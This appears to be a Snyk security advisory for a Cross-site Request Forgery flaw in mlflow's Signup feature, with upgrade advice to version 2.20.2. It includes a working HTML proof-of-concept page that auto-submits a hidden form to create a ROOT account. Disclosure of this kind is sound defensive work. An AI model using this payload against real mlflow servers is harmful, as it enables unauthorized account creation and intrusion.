Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsLearn about Cross-site Request Forgery (CSRF) vulnerabilities in an interactive lesson.
Start learningUpgrade mlflow
to version 2.20.2 or higher.
mlflow is a platform to streamline machine learning development, including tracking experiments, packaging code into reproducible runs, and sharing and deploying models.
Affected versions of this package are vulnerable to Cross-site Request Forgery (CSRF) through the Signup
feature. An attacker can create a new account, which may be used to perform unauthorized actions on behalf of the malicious user.
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>CSRF Attack</title> </head> <body onload="document.forms['csrfForm'].submit();"> <form id="csrfForm" action="http://127.0.0.1:5000/api/2.0/mlflow/users/create" method="POST"> <input type="hidden" name="username" value="ROOT"> <input type="hidden" name="password" value="ROOT"> </form> </body> </html>